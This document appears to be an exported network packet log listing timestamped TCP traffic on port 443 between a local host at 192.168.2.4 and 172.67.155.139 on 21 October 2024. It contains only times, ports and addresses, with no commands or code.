                                                                                                                                              Oct 21, 2024 08:34:02.594412088 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.594455957 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.594507933 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.594544888 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.594695091 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.594757080 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.594788074 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.594892979 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.594944954 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.594959021 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.595040083 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.595093012 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.595109940 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.643192053 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.711498022 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.752665043 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.752716064 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759193897 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759270906 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.759287119 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759413958 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759470940 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.759483099 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759625912 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759696007 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.759707928 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759803057 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759850979 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.759861946 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.759996891 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.760055065 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.760065079 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.799585104 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.799622059 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.846293926 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.872673988 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.876250029 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.876327038 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.876346111 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.876461983 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.876517057 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.876529932 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.876857996 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.876924992 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.876935959 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.877022982 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.877073050 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.877093077 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.877120972 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.877177000 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.877547979 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.924417973 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.924439907 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.924536943 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.924595118 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.924606085 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.971293926 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.990061045 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.993921041 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994002104 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994108915 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.994121075 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994146109 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994172096 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.994268894 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994324923 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.994339943 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994388103 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994389057 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:02.994410038 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:02.994461060 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.042150021 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.042171001 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.042243958 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.042263031 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.042314053 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.042327881 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.096302032 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.111408949 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.111432076 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.111552954 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.111607075 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.111630917 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.111670017 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.111676931 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.111732006 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.111742973 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.111793041 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.112445116 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.112462044 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.112512112 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.158885002 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.158891916 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.159766912 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.159840107 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.159845114 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.159856081 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.159888983 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.159893990 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.159931898 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.239880085 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.239917994 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.239964962 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.240024090 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.240092039 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.240104914 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.240149975 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.240159988 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.240250111 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.240304947 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.240315914 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.240356922 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.277384996 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.277478933 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.277492046 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.277600050 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.277650118 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.277650118 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.277663946 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.277728081 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.277781010 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.277791977 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.330792904 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.346426964 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.346448898 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.346534014 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.346626043 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.346647978 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.346693039 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.346715927 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.346741915 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.347161055 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.347230911 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.347242117 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.347295046 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.394743919 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.394934893 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.395020962 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.395123959 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.395136118 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.440058947 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.463917971 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.463943005 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.464071035 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.464123011 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.464162111 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.464204073 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.464205027 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.464736938 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.467236042 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.512613058 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.512687922 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.512738943 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.512823105 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.577982903 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.578284025 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.581590891 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.581664085 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.581938028 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.582019091 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.582025051 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.582051039 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.582082987 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.582103014 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.582130909 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.627661943 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.630060911 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.630069017 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.630136013 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.630217075 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.630223989 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.630268097 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.630290031 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.699074030 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.699275970 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.699459076 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.699466944 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.699501991 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.699533939 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.699561119 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.699585915 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.748434067 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.748470068 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.748651028 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.748651981 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.748676062 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.799426079 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.817683935 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.817693949 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.817722082 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.817749023 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.817781925 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.817800999 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.817945957 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.861923933 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.934609890 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.934624910 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.934643984 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.934654951 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.934679985 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.934688091 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.934698105 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.934803009 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.934803009 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.934837103 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.982815027 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:03.983001947 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:03.983016968 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.033931017 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.052056074 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.052067041 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.052110910 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.052135944 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.052139044 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.052170992 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.052195072 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.052195072 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.052222013 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.100548983 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.100558996 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.100581884 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.100617886 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.100641012 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.100663900 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.100687027 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.169857025 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.169881105 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.169965029 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.169991016 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.170145988 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.218769073 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.218790054 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.218939066 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.218939066 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.218954086 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.219012022 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.287698984 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.287720919 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.287798882 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.287813902 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.287966013 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.335763931 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.335798979 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.335860014 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.335886002 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.335916042 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.335936069 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.405297995 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.405324936 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.405391932 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.405410051 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.405436993 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.405456066 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.453607082 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.453630924 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.453788042 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.453788996 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.453803062 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.454045057 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.525980949 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.526015997 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.526108027 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.526129961 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.526282072 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.571063995 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.571088076 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.571260929 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.571280956 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.571340084 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.643570900 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.643589020 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.643774033 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.643800020 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.643811941 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.643846035 CEST44349730172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:04.643857002 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.643857002 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.643912077 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:04.647129059 CEST49730443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:37.648758888 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:37.648804903 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:37.648885012 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:37.662134886 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:37.662158012 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.288440943 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.288517952 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.335197926 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.335217953 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.335603952 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.338784933 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.342195988 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.383399963 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.838076115 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.838133097 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.838161945 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.838184118 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.838207960 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.838247061 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.838259935 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.838279963 CEST44349737172.67.155.139192.168.2.4
